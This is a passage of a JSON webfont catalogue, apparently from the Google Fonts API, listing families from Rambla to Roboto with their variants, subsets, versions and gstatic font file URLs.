},\n    {\n      \"family\": \"Rambla\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rambla/v13/snfrs0ip98hx6mr0I7IONthkwQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/rambla/v13/snfps0ip98hx6mrEIbgKFN10wYKa.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rambla/v13/snfos0ip98hx6mrMn50qPvN4yJuDYQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/rambla/v13/snfus0ip98hx6mrEIYC2O_l86p6TYS-Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rammetto One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rammettoone/v14/LhWiMV3HOfMbMetJG3lQDpp9Mvuciu-_SQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rampart One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rampartone/v7/K2F1fZFGl_JSR1tAWNG9R6qgLS76ZHOM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ranchers\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ranchers/v13/zrfm0H3Lx-P2Xvs2AoDYDC79XTHv.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rancho\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rancho/v17/46kulbzmXjLaqZRlbWXgd0RY1g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ranga\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ranga/v17/C8ct4cYisGb28p6CLDwZwmGE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ranga/v17/C8cg4cYisGb28qY-AxgR6X2NZAn2.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rasa\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN4YJW41fcvN2KT4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN5GJW41fcvN2KT4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN50JW41fcvN2KT4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN6YIm41fcvN2KT4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN6hIm41fcvN2KT4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZth2d8_v3bT4Ycc.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZoZ2d8_v3bT4Ycc.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZrR2d8_v3bT4Ycc.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZlhxd8_v3bT4Ycc.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZmFxd8_v3bT4Ycc.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rationale\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rationale/v24/9XUnlJ92n0_JFxHIfHcsdlFMzLC2Zw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ravi Prakash\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/raviprakash/v19/gokpH6fsDkVrF9Bv9X8SOAKHmNZEq6TTFw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Readex Pro\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTCYUSmgmsglvjkag.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTCv0Smgmsglvjkag.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTC4USmgmsglvjkag.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTC00Smgmsglvjkag.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTCP0Omgmsglvjkag.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/readexpro/v15/SLXnc1bJ7HE5YDoGPuzj_dh8uc7wUy8ZQQyX2KY8TL0kGZN6blTCBkOmgmsglvjkag.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Recursive\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v37\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadDck018vwxjDJCL.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCCk018vwxjDJCL.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCwk018vwxjDJCL.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBclE18vwxjDJCL.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBllE18vwxjDJCL.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadAClE18vwxjDJCL.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/recursive/v37/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadArlE18vwxjDJCL.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Red Hat Display\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbjKWckg5-Xecg3w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbmyWckg5-Xecg3w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbl6Wckg5-Xecg3w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbrKRckg5-Xecg3w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbouRckg5-Xecg3w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbuyRckg5-Xecg3w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbsWRckg5-Xecg3w.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVxAsz_VWZk3zJGg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVmgsz_VWZk3zJGg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVqAsz_VWZk3zJGg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVRAwz_VWZk3zJGg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVfQwz_VWZk3zJGg.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVGgwz_VWZk3zJGg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVMwwz_VWZk3zJGg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Red Hat Mono\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQQPI-7HNuW4QuKI.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQV3I-7HNuW4QuKI.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQW_I-7HNuW4QuKI.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQYPP-7HNuW4QuKI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQbrP-7HNuW4QuKI.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLTfLHvUwVqKIJuw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLE_LHvUwVqKIJuw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLIfLHvUwVqKIJuw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLzfXHvUwVqKIJuw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWL9PXHvUwVqKIJuw.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Red Hat Text\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML-ZwVrbacYVFtIY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML7hwVrbacYVFtIY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML4pwVrbacYVFtIY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML2Z3VrbacYVFtIY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML193VrbacYVFtIY.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAz4PXQdadApIYv_g.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzvvXQdadApIYv_g.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzjPXQdadApIYv_g.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzYPLQdadApIYv_g.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzWfLQdadApIYv_g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Red Rose\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8y8_sDcjSsYUVUjg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yrfsDcjSsYUVUjg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yn_sDcjSsYUVUjg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yc_wDcjSsYUVUjg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8ySvwDcjSsYUVUjg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Redacted\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/redacted/v6/Z9XVDmdRShme2O_7aITe4u2El6GC.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Redacted Script\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/redactedscript/v6/ypvEbXGRglhokR7dcC3d1-R6zmxqHUzVmbI397ldkg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/redactedscript/v6/ypvBbXGRglhokR7dcC3d1-R6zmxSsWTxkZkr_g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/redactedscript/v6/ypvEbXGRglhokR7dcC3d1-R6zmxqDUvVmbI397ldkg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Redressed\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/redressed/v25/x3dickHUbrmJ7wMy9MsBfPACvy_1BA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Reem Kufi\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/reemkufi/v20/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtuZnEGGf3qGuvM4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/reemkufi/v20/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQttRnEGGf3qGuvM4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/reemkufi/v20/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtjhgEGGf3qGuvM4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/reemkufi/v20/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtgFgEGGf3qGuvM4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Reem Kufi Fun\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/reemkufifun/v6/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChoYj3nCgrvqZzZXq.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/reemkufifun/v6/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChoYR3nCgrvqZzZXq.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/reemkufifun/v6/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChob92XCgrvqZzZXq.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/reemkufifun/v6/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChobE2XCgrvqZzZXq.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Reem Kufi Ink\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/reemkufiink/v8/oPWJ_kJmmu8hCvB9iFumxZSnRj5dQnSX1ko.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Reenie Beanie\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/reeniebeanie/v16/z7NSdR76eDkaJKZJFkkjuvWxbP2_qoOgf_w.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Reggae One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/reggaeone/v14/~CgwKClJlZ2dhZSBPbmUgACoECAEYAQ==.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Revalia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/revalia/v20/WwkexPimBE2-4ZPEeVruNIgJSNM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rhodium Libre\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rhodiumlibre/v17/1q2AY5adA0tn_ukeHcQHqpx6pETLeo2gm2U.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ribeye\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ribeye/v21/L0x8DFMxk1MP9R3RvPCmRSlUig.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ribeye Marrow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ribeyemarrow/v22/GFDsWApshnqMRO2JdtRZ2d0vEAwTVWgKdtw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Righteous\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/righteous/v13/1cXxaUPXBpj2rGoU7C9mj3uEicG01A.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Risque\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/risque/v20/VdGfAZUfHosahXxoCUYVBJ-T5g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Road Rage\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/roadrage/v5/6NUU8F2fKAOBKjjr4ekvtMYAwdRZfw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgWxPKTM1K9nz.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrIzcXLsnzjYk.ttf\",\n        \"300\": 